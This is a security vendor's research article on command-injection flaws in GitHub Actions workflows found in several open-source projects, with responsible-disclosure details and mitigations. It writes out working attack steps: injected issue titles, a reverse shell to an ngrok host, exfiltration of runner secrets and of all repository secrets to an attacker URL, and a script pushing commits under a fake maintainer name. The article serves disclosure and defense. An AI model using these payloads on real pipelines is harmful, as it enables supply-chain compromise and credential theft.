How We Discovered Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects

Head of Security Research

The upsurge of supply-chain incidents in recent years highlights the importance of protecting build servers and deployment processes. In the case of GitHub Actions, GitHub has implemented many security features for their hosted runners – isolation, ephemeral environments, golden images, and more. Yet, as we demonstrate in this article, innocent mistakes in writing pipelines can compromise a project's entire source code and lead to supply-chain incidents, even when the pipelines run in isolated build environments.

Executive Summary

Cycode discovered critical vulnerabilities in several popular open-source projects, each of which can cause a supply-chain attack through the CI process. We found the vulnerabilities in misconfigured GitHub Actions workflows. They were missing proper input sanitization, which allowed malicious actors to inject code into the builds through issues and comments and to access privileged tokens.

Out of dozens of vulnerable repositories we found and reported, the most popular were:

  • Liquibase – Track, version, and deploy database schema changes. Applied fix – 3278525.
  • Dynamo BIM – A visual programming tool that is sponsored by Autodesk. Applied fix – disabled the workflows.
  • FaunaDB – Transactional database delivered as a secure and scalable cloud API with native GraphQL. Applied fix – ee6f53f.
  • Wire – An open-source communication platform. Applied fix – 9d39d6c.
  • Astro – Static site builder. Applied fix – 650fb1a.
  • Kogito – A business automation technology that is sponsored by Red Hat. Applied fix – 53c18e5.
  • Ombi – A popular media request tool. Applied fix – 5cc0d77.

Across the combined user base of these tools, these vulnerabilities could affect millions of potential victims.

We responsibly disclosed these vulnerabilities to the organizations and the maintainers, and they fixed them quickly. We didn’t find any signs of prior exploitation of the vulnerable workflows.

Note: These aren’t vulnerabilities in GitHub Actions infrastructure but in misusing workflows and not applying best practices. Such vulnerabilities could also be found in private GitHub repositories.

Article Outline

Cycode is a leader in software supply chain security solutions, and it is our responsibility to raise awareness and educate the community about security issues in code and build systems. Apart from reporting these vulnerabilities, we want to share our research journey with the community and elaborate on the following topics:

  • What the GitHub Actions platform is, and what makes it a powerful build system.
  • GitHub Actions security concepts, including how misconfigurations such as the ones we found can be leveraged into code execution.
  • GitHub Actions internals, to understand what malicious actors could achieve with code execution on the runners.
  • Possible mitigations for such vulnerabilities, and best practices for developers and DevOps teams using GitHub Actions.

Background

For most of its history, GitHub was all about storing source code. In 2018, the company announced a different but related direction by launching GitHub Actions, a CI/CD platform that lets GitHub developers automate development workflows easily. Since then, GitHub Actions has become extremely popular, mainly due to its marketplace, which contains more than 11 thousand actions, and its free hosted runners for public repositories.

Any repository on GitHub can add YAML files (called workflows) under the .github/workflows path; once certain events occur, GitHub runs the jobs they define. For example, the following workflow dictates that each push to the repository runs code that prints “Hello World!”.

name: GitHub Actions Demo

on: [push]

jobs:
 Actions-Hello-World:
   runs-on: ubuntu-latest
   steps:
     - run: echo "Hello World!"

Like any continuous integration system, it has many uses. Sample workflows could be:

  • Building the code into a container and uploading it to the chosen registry.
  • Scheduled tasks that scan vulnerabilities in code.
  • Running tests for forked pull requests.
  • Automatic labeling for issues.
  • Sending issues to a ticket-handling system (Jira/Monday/Asana/etc.).
  • Supporting automatic merges for PRs created by external bots.
  • And more.

GitHub Actions Security

A GitHub runner is an environment running GitHub's open-source runner application, which connects to a personal account or an organization and listens to the workflow queue.

GitHub allows the developers to either set up their runners on self-hosted machines, or the more popular method, on GitHub-hosted machines. While in the former case, GitHub is limited in providing security measures, in the latter case, they explain that each job in your workflow will run on a completely clean virtual machine with pre-built tools depending on the selected operating system.

Before the runner receives anything, it must be authorized to run jobs for that specific user or organization. It then gets a valid OAuth JWT token, which is saved in a .credentials file and used to receive jobs from the GitHub Actions service API.

Apart from the OAuth token, at the start of each workflow run, GitHub automatically creates a unique GITHUB_TOKEN, which is used to authenticate and access GitHub resources (code, PRs, issues, and more). For workflows triggered from forked repositories, this token is limited to read-only permissions; for any other event, it has read and write permissions by default. When the job starts, the token is passed to the runner, which securely passes it to the subprocesses it creates; the token is never persisted on the machine.

This GitHub runner environment introduces three main risks which we will tackle in this article:

  • A malicious actor committing undesired code into the repository can cause a critical supply chain incident as an attacker can introduce backdoors deployed to end-users or organization environments. To achieve this, an attacker would need to fetch sensitive tokens with write permissions for that repository. This could be done by utilizing the GITHUB_TOKEN created for that workflow or any other PAT (Personal Access Token).
  • A malicious actor could exfiltrate workflow secrets and, in some cases, also repository or organization secrets. These secrets could be tokens for private repositories, container registries, cloud assets, or any other sensitive information.
  • A much smaller risk would be the malicious actor’s ability to run botnets or crypto miners using your runner infrastructure.

To help us configure the runners properly, GitHub supplies extensive best-practice documentation. Going over this document, we realized that many security pitfalls await developers building these workflows, so many that even popular repositories with tens of thousands of stars fail to follow all of the guidance. This is how our research started.

Issue Injection 101

Let’s take the following workflow as an example:

name: Issues

on:
  issues:
    types: [opened]

jobs:
  print_issue_title:
    runs-on: ubuntu-latest

    name: Print issue title
    steps:
    - run: echo "${{github.event.issue.title}}"

This sample workflow prints the title of every issue created in the repository. At first sight, it looks innocent, but what happens if we open an issue with the following title: new issue title" && ls / && echo "?

We managed to run the ls / command on the hosted runner!

The GitHub service that dispatches these workflows to the hosted runners replaces the ${{ ... }} macros blindly, so echo "${{github.event.issue.title}}" becomes echo "new issue title" && ls / && echo "", giving us arbitrary code execution.
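The substitution can be mimicked outside GitHub to see why it is dangerous. The following Python sketch is an illustration only: expand_macros is a hypothetical helper, not GitHub's implementation, and it assumes the expression is replaced with the raw value before the shell ever parses the script.

```python
import re


def expand_macros(script: str, context: dict) -> str:
    """Replace every ${{ key }} with the raw context value, with no escaping.

    Hypothetical stand-in for the blind macro replacement described above.
    """
    def substitute(match):
        return str(context[match.group(1).strip()])

    return re.sub(r"\$\{\{(.*?)\}\}", substitute, script)


# The run step from the sample workflow and the crafted issue title.
step = 'echo "${{github.event.issue.title}}"'
title = 'new issue title" && ls / && echo "'

rendered = expand_macros(step, {"github.event.issue.title": title})
print(rendered)
```

The rendered string is what the shell receives: the quote in the title closes the echo argument, and everything after it is parsed as additional commands.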

In addition, the default GITHUB_TOKEN created for this event has read/write access to the repository and potentially allows us to commit changes to it.

So far, we have given a brief background on GitHub Actions security and shown how a malicious actor can inject attacker-controlled code into a privileged build pipeline. Let’s look at how the risks mentioned above can materialize by diving deeper into GitHub runner internals.

Diving into GitHub Actions Runner

Security Limitations in GitHub Runners

As part of the security model that GitHub implemented, not everything is achievable as an attacker, even with code execution capabilities. We will list some of the main limitations:

Clean workspace per job – each new job (a workflow may contain several jobs) runs on a clean, VM-isolated instance. Persistence on the runner can therefore affect subsequent steps, but only within the currently running job.

Secrets are passed per step – each workflow job contains one or more steps; these steps, which may contain secrets, are transferred to the runner just before the execution. This means that if subsequent steps don’t run for any reason, their secrets won’t be reachable to the runner.

Permissions for GITHUB_TOKEN – We explained previously that at the start of each workflow run, GitHub creates a new GITHUB_TOKEN with the appropriate permissions. The token permissions can be altered either by adding a permissions: line to the workflow file or through the organization configuration. In addition, this token has several limitations; for example, it can’t edit repository workflow files.

Exploring the runner through arbitrary code execution

Based on our experience with the vulnerabilities we found, we built an intentionally vulnerable workflow to investigate how a malicious actor could exploit it for their needs. We will use this workflow frequently throughout the article.

name: Demo vulnerable workflow

on:
  issues:
    types: [opened]

env:
  # Environment variable for demonstration purposes
  GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

jobs:
  vuln_job:
    runs-on: ubuntu-latest

    steps:
      # Checkout used for demonstration purposes
      - uses: actions/checkout@v2

      - run: |
          echo "ISSUE TITLE: ${{github.event.issue.title}}"
          echo "ISSUE DESCRIPTION: ${{github.event.issue.body}}"

      - run: |
          curl -X POST -H "Authorization: Token ${{ secrets.BOT_TOKEN }}" -d '{"labels": ["New Issue"]}' ${{ github.event.issue.url }}/labels

This workflow does a simple task – whenever a new issue is created, it will check out the code, print the issue details to the log, and label it as “New Issue” using a PAT.
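Risky lines like the two echo statements in this workflow can be spotted mechanically. The sketch below is a rough heuristic, not a complete linter: the function name, the regular expression, and the short list of untrusted fields (issue, comment, and pull request titles and bodies) are assumptions made for illustration, and it tracks run blocks by indentation instead of parsing YAML.

```python
import re

# Assumed list of attacker-controlled fields; real workflows may use others.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(issue|comment|pull_request)\.(title|body)\s*\}\}"
)
RUN_KEY = re.compile(r"\s*(-\s*)?run:")


def find_injectable_lines(workflow_text):
    """Return (line number, text) pairs where an untrusted expression is
    expanded directly inside a run script."""
    findings = []
    run_indent = None  # indentation of the current run key, if inside one
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.strip()
        indent = len(line) - len(line.lstrip())
        if run_indent is not None and stripped and indent <= run_indent:
            run_indent = None  # indentation dropped back: the run block ended
        if RUN_KEY.match(line):
            run_indent = indent
        if run_indent is not None and UNTRUSTED.search(line):
            findings.append((number, stripped))
    return findings


SAMPLE = """\
steps:
  - run: |
      echo "ISSUE TITLE: ${{github.event.issue.title}}"
  - env:
      TITLE: ${{github.event.issue.title}}
    run: echo "ISSUE TITLE: $TITLE"
"""

findings = find_injectable_lines(SAMPLE)
print(findings)
```

Only the first step is reported. The second step references the same field, but inside an env mapping, so the value reaches the script as data and not as script text.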

As we previously explained, the line echo "ISSUE TITLE: ${{github.event.issue.title}}" is vulnerable to command injection. To explore our post-exploitation capabilities on the runner machine, we will create a simple reverse shell using ngrok.

First, we initiate ngrok by running ngrok tcp 10000 on our machine; second, we run a local Netcat listener with nc -lv 10000 and use the ngrok endpoint, for example, 8.tcp.ngrok.io:15063 in our payload.

So our payload is a new issue with the following title:

New malicious issue title" && bash -i >& /dev/tcp/8.tcp.ngrok.io/15063 0>&1 && echo "

We are running a reverse shell inside the runner!

Note: this demonstrates exploitation techniques for an Ubuntu-based runner. With a few tweaks, they could work on Windows-based and macOS-based machines.

While exploring the runner, we could find several interesting things:

  • In the runner folder /home/runner/runners/2.287.1, we could see a .credentials file containing the OAuth JWT token used for receiving jobs from the GitHub Actions service.
$ cat /home/runner/runners/2.287.1/.credentials

{"data":{"token":"REDACTED"},"scheme":"OAuthAccessToken"}
  • That folder also contains a .runner file that helps to authenticate and receive the right jobs.
$ cat /home/runner/runners/2.287.1/.runner

{
  "AgentId": "1",
  "AgentName": "Hosted Agent",
  "PoolId": "2",
  "ServerUrl": "https://pipelines.actions.githubusercontent.com/REDACTED/",
  "SkipSessionRecover": "True",
  "IsHostedServer": "True",
  "workFolder": "_work",
  "WorkFolder": "/home/runner/work",
  "MonitorSocketAddress": "127.0.0.1:49100"
}
  • By looking at the relevant processes using ps -aux | grep runner and combining the previous knowledge, we could deduce the execution flow of the runner: 
    • The runner process is provisioned by a .NET executable called provisioner. It provisions the Runner.Listener executable, which uses the OAuth credentials to fetch the job from the GitHub Actions service.
    • Once Runner.Listener fetches a job, it creates the Runner.Worker and passes it the job information, including GITHUB_TOKEN, through IPC.
    • Once the Runner.Worker receives a run command, it writes the shell script to disk and runs it through bash.
root         664  0.8  1.2 3684004 85660 ?       Ssl  17:53   0:02 /opt/runner/provisioner/provisioner --agentdirectory /home/runner/runners --settings /opt/runner/provisioner/.settings
runner      1391  0.9  1.4 3639900 102872 ?      Sl   17:54   0:02 /home/runner/runners/2.287.1/bin/Runner.Listener run
runner      1410  1.6  1.6 3674340 114088 ?      Sl   17:54   0:03 /home/runner/runners/2.287.1/bin/Runner.Worker spawnclient 112 115
runner      1512  0.0  0.0   8704  3440 ?        S    17:54   0:00 /usr/bin/bash -e /home/runner/work/_temp/39dda61c-1cea-4106-b28e-ec9a4f223df2.sh
  • The ~/work/_temp/_github_workflow/event.json file contains complete information regarding the triggered event for the workflow.
  • The ~/work/_actions folder contains all dependent actions we run. For example: ~/work/_actions/actions/checkout/v2 includes all the checkout action source code.

Extracting Secrets from the Workflow

Secrets in environment variables

In the sample workflow above, we defined GITHUB_TOKEN as an environment variable for the entire workflow, and therefore for every job and step in it. In such cases, we can fetch its content quickly and abuse it:

$ env | grep GITHUB_TOKEN 

GITHUB_TOKEN=ghs_REDACTED

If the environment variable were defined at the step level, it would be accessible only in the step where it was defined. This makes the secret harder to fetch, but it is still possible for advanced attackers, as we’ll show soon.

Secrets from checkout action

Checkout is one of the most popular actions in the marketplace. Put simply, it runs git clone on your repository, using your GITHUB_TOKEN by default.

By default, it also saves the credentials in the .git/config file. Because our example uses this action, we can easily extract the GITHUB_TOKEN.

$ cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION

extraheader = AUTHORIZATION: basic REDACTED

$ cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION | cut -d':' -f 2 | cut -d' ' -f 3 | base64 -d 

x-access-token:ghs_REDACTED
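The cut and base64 pipeline above can be written out step by step. This is a minimal Python sketch of the same decoding, assuming the header line has the exact shape shown in the output; decode_extraheader is a hypothetical name, and the token is a made-up placeholder, not a real credential.

```python
import base64


def decode_extraheader(config_line: str) -> tuple:
    """Split 'extraheader = AUTHORIZATION: basic <base64>' into (user, token)."""
    # The encoded credentials are the last whitespace-separated field.
    encoded = config_line.strip().rsplit(None, 1)[-1]
    # HTTP basic credentials decode to 'user:password'.
    user, _, token = base64.b64decode(encoded).decode().partition(":")
    return user, token


# Build a stand-in config line from a placeholder token for demonstration.
placeholder = base64.b64encode(b"x-access-token:ghs_EXAMPLE").decode()
line = f"extraheader = AUTHORIZATION: basic {placeholder}"

print(decode_extraheader(line))
```

The point of the sketch is that the stored value is only base64-encoded, not encrypted, so anything able to read .git/config can recover the token.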

Secrets in run scripts

If we peek at the $RUNNER_TEMP directory, which maps to /home/runner/work/_temp, we’ll notice that each run step appears as a separate shell file.

total 20K
drwxr-xr-x 4 runner docker 4.0K Feb 21 17:54 .
drwxr-xr-x 6 runner root   4.0K Feb 21 17:54 ..
-rw-r--r-- 1 runner docker  132 Feb 21 17:54 39dda61c-1cea-4106-b28e-ec9a4f223df2.sh
drwxr-xr-x 2 runner docker 4.0K Feb 21 17:54 _github_workflow
drwxr-xr-x 2 runner docker 4.0K Feb 21 17:54 _runner_file_commands

These shell files contain the run scripts defined in the workflow definition. In our case, the only shell file written is the one that was vulnerable to the injection attack:

$ cat $RUNNER_TEMP/39dda61c-1cea-4106-b28e-ec9a4f223df2.sh 

echo "ISSUE TITLE: New malicious issue title" && bash -i >& /dev/tcp/8.tcp.ngrok.io/15063 0>&1 && echo "" 
echo "ISSUE DESCRIPTION: "

This means that if ${{ secrets... }} were used inside a run command, we’d be able to see these secrets as plain text by inspecting these files. In our example, no earlier run command contained secrets, but one later command contains the BOT_TOKEN secret.

So how can we fetch that future secret? We create persistence. All subsequent steps run on the same machine, so we only need to log every new file created in the $RUNNER_TEMP folder.

One possible implementation for this could be a simple Python script using the watchdog package to monitor changes to folders. For each newly added shell file, the script will send it to a controlled server via a POST request. To ease its deployment, this script could be built into a container and be run easily in the runner through Docker.

To demonstrate this capability, we tried running it in our lab environment in the following way:

  • Creating and deploying in our lab a Python server that records all POST requests.
  • Creating a Python script that records modified shell scripts in a directory and sends them to a designated server.
  • Packing the malicious script into a docker container.
  • Running the container image in detached mode:
sudo docker run --rm -d -v /home/runner/work/_temp:/app/monitored $DOCKER_USERNAME/actionmonitor $LAB_URL
  • Once we continue and exit the shell, we receive the secret from the subsequent run command:
INFO:root:POST request,
Path: /
Headers:
Host: REDACTED
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 316
Content-Type: multipart/form-data; boundary=c02346046d63dd9df9d114fa5cd7f1f2


Body:
--c02346046d63dd9df9d114fa5cd7f1f2
Content-Disposition: form-data; name="upload_file"; filename="71d7557f-0295-4ef5-972a-b3ba3b7ccc24.sh"


curl -X POST  -H "Authorization: Token ghp_REDACTED" -d '{"labels": ["New Issue"]}' https://api.github.com/repos/REDACTED/demo/issues/6/labels


--c02346046d63dd9df9d114fa5cd7f1f2--
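The core of the monitoring step is simply noticing new shell files in a directory. The sketch below illustrates that idea only: it swaps the watchdog package for plain standard-library polling, uses a throwaway temporary directory as a stand-in for $RUNNER_TEMP, and deliberately leaves out the upload. The function names are hypothetical and this is not the script used in the lab.

```python
import os
import tempfile


def list_scripts(directory):
    """Return the set of .sh file names currently in the directory."""
    return {name for name in os.listdir(directory) if name.endswith(".sh")}


def new_scripts(directory, seen):
    """Return script names that appeared since the last poll; update seen in place."""
    current = list_scripts(directory)
    added = sorted(current - seen)
    seen |= current
    return added


# Demonstration: a temporary directory plays the role of the monitored folder.
with tempfile.TemporaryDirectory() as temp_dir:
    seen = list_scripts(temp_dir)  # baseline snapshot (empty here)
    with open(os.path.join(temp_dir, "step-2.sh"), "w") as handle:
        handle.write('echo "next step"\n')  # simulates the next run step
    detected = new_scripts(temp_dir, seen)
    print(detected)
```

The same observation is what makes the technique possible: every run step is written to disk with its expressions already expanded, so any process on the machine can read it.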

Additional advanced methods to exfiltrate secrets

Once we have complete control of the runner, we also have full control over its subsequent operations, whether bash commands, passing secrets through environment variables, or external actions.

This means that if secrets were passed to actions, explicitly or implicitly (through default value), we can record them and use them maliciously. A POC code for this behavior is out of this article’s scope, but we can share some possible methods to achieve this behavior:

  • Some secrets, including input variables, are passed through environment variables. Recording all created processes and exfiltrating their environment variables could also achieve that goal.
  • All subsequent steps, including environment variables and input for additional actions, are sent to the runner through the network. We can record all the network traffic and extract sensitive information.
  • We can create an additional runner listener using the previously mentioned OAuth credentials. With the right timing, our runner could potentially receive the same job again from the start. We can record the complete job information by either listening to HTTP traffic or by intercepting the IPC communication and extracting the GITHUB_TOKEN for this new job.
  • It should be possible to research the memory layout of the Runner.Worker process and extract GITHUB_TOKEN from there.

Committing Malicious Code to the Repository

The most significant possible impact of these vulnerabilities is the ability to affect millions of end-users by inserting malicious changes into the repository without notice, as happened in the Codecov and SolarWinds incidents.

In our example, we already had a prepared git environment because we were using the checkout action, but we could also set it up using GITHUB_TOKEN or any other access token. We prepared the following simple script to demonstrate how easily code could be committed to the repository:

#!/bin/bash


# File to commit
FILE_URL_PATH_TO_COMMIT=$1
# Repository path where to commit
PATH_TO_COMMIT=$2


COMMIT_NAME="Maintainer Name"
COMMIT_EMAIL="maintainer@gmail.com"
COMMIT_MESSAGE="innocent commit message"


# Fetching the file
curl "$FILE_URL_PATH_TO_COMMIT" -o "$PATH_TO_COMMIT" --create-dirs


# Committing to the repo
git add *
find . -name '.[a-z]*' -exec git add '{}' ';' # Adding hidden files
git config --global user.email "$COMMIT_EMAIL"
git config --global user.name "$COMMIT_NAME"
git commit -m "$COMMIT_MESSAGE"
git push -u origin HEAD

This script could be run manually in the reverse shell (as shown below) or easily automated. Let’s run it by giving it a remote file URL to commit, and the desired path:

$ curl -o /tmp/script.sh $SCRIPT_URL 

$ chmod +x /tmp/script.sh 

$ /tmp/script.sh $MALICIOUS_FILE_URL innocent_file.txt  
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     5  100     5    0     0    333      0 --:--:-- --:--:-- --:--:--   333
[main 196e93a] innocent commit message
 1 file changed, 1 insertion(+)
 create mode 100644 innocent_file.txt
To https://github.com/REDACTED/REDACTED
    ff7a7fd..196e93a  HEAD -> main 
branch 'main' set up to track 'origin/main'.

When we look at our vulnerable repository, we’ll notice the commit made by “Maintainer Name”, as indicated in the script.

Sophisticated attackers could further enhance this capability and hide their traces by altering the git tree so the commit won’t be in plain sight.

Extracting Repository and Organizational Secrets

By creating a new workflow, attackers could also exfiltrate repository and organization secrets beyond those used by the vulnerable workflow.

Note: by default, GITHUB_TOKEN doesn’t have permission to push into the .github/workflows directory; hence, this method applies only if the attacker gets a personal access token or GitHub App token with workflow permissions.

A sample method for such an attack is to create a workflow similar to the one below and run it through the GitHub API, giving it a server URL as input.

name: Secrets

on:
 workflow_dispatch:
   inputs:
     url:
       required: true

jobs:
 build:
   runs-on: ubuntu-latest

   steps:
     - run: |
         echo "${{ toJSON(secrets) }}" > .secrets
         curl -X POST -s --data "@.secrets" ${{ github.event.inputs.url }} > /dev/null

Once you commit the workflow using the methods shown above, you can run it with the following GitHub API call:

curl -X  POST -d '{"ref": "<REF>", "inputs": {"url": "<SERVER_URL>"}}' -H "Authorization: Token ghp_REDACTED" https://api.github.com/repos/<USER>/<REPO>/actions/workflows/<WORKFLOW_ID>/dispatches

Running this workflow sends all repository and organization secrets that the access token has permission to access, including those that didn’t appear in the original workflow. So, when we look at our lab server, we can see these secrets:

{  
    github_token: ghs_REDACTED,  
    SECRET1: secret_value,
    SECRET2: another_secret_value
}

Mitigations

We will present several methods by which you can protect your workflows and deny the techniques we demonstrated above.

Avoid run steps and use external actions instead. For example, instead of running curl for updating a comment, you can use peter-evans/create-or-update-comment that does it for you. Dependent actions are less prone to script-injection attacks and are favored.

Sanitize your input using environment variables. In our example, if we had passed the untrusted input through an environment variable, the workflow would not have been vulnerable to the attack. The safe approach looks like the following:

     - env:
         TITLE: ${{github.event.issue.title}}
         DESCRIPTION: ${{github.event.issue.body}}

       run: |
         echo "ISSUE TITLE: $TITLE"
         echo "ISSUE DESCRIPTION: $DESCRIPTION"
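The difference is that the shell expands $TITLE only after it has parsed the script, so the value is treated as data. The Python sketch below reproduces that behavior locally under stated assumptions: it runs the same echo line through sh on a machine where sh is available, with the malicious title supplied through the environment.

```python
import os
import subprocess

# The same crafted title used in the injection example.
title = 'new issue title" && ls / && echo "'

# The script text is fixed; the untrusted value arrives via the environment,
# so its quote characters are never interpreted as shell syntax.
result = subprocess.run(
    ["sh", "-c", 'echo "ISSUE TITLE: $TITLE"'],
    env={**os.environ, "TITLE": title},
    capture_output=True,
    text=True,
    check=True,
)
output = result.stdout.strip()
print(output)
```

The title is printed verbatim, including the && ls / part, and no extra command runs.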

Limit your GITHUB_TOKEN permissions. Override the token’s default permissions with the minimum needed for the workflow’s operation, using the permissions key in the workflow file. For example, permissions: read-all gives your token read-only permissions.
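When reviewing many workflow files, a quick first pass is to list those that never mention permissions and therefore rely on the default token scope. The following Python sketch is a simple text check under that assumption: declares_permissions is a hypothetical helper, it does not parse YAML, and it does not judge whether the declared permissions are actually minimal.

```python
import re


def declares_permissions(workflow_text: str) -> bool:
    """True if any line starts a permissions key (workflow level or job level)."""
    pattern = r"^\s*permissions\s*:"
    return re.search(pattern, workflow_text, flags=re.MULTILINE) is not None


restricted = "name: Issues\npermissions: read-all\non:\n  issues:\n    types: [opened]\n"
default = "name: Issues\non:\n  issues:\n    types: [opened]\n"

print(declares_permissions(restricted), declares_permissions(default))
```

A workflow for which this returns False is a candidate for review, not proof of a vulnerability.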

Limit your PAT/GitHub Apps token permissions. When GITHUB_TOKEN isn’t sufficient, additional tokens could be used to automate processes. These tokens could be more permissive than GITHUB_TOKEN and thus should be limited accordingly.

Limit the exposure of your secrets. When you create organizational secrets, it’s better to set the exact repositories that will use them.

Require approval for all outside collaborators. The default behavior is to require manual approval only for first-time contributors. In that case, an attacker could create a simple and innocent pull request (like a documentation update). Once it is accepted, their subsequent pull request could be malicious and automatically trigger the workflow. So “Require approval for all outside collaborators” provides a more robust defense.

Conclusion

Unlike many vulnerability disclosures in the InfoSec industry, most of our reported vulnerabilities were fixed on the same day we reported them. This emphasizes the gap between the potential damage such an innocent mistake could cause and how easy it is to fix.

Your build systems, and especially GitHub Actions workflows, are critical paths in your software deployment: they can affect the final artifacts shipped to users and contain sensitive secrets like cloud tokens, so they should be protected accordingly with security reviews, best practices, and external tools like Cycode’s platform.

How Can Cycode Help You?

Cycode’s platform secures your software supply chain by providing complete visibility into enterprise DevOps tools and infrastructure. With a simple GitHub integration, Cycode’s platform will detect the vulnerabilities mentioned above and additional configuration issues in your GitHub Actions workflows and help you remediate them. Such violations will look like the following: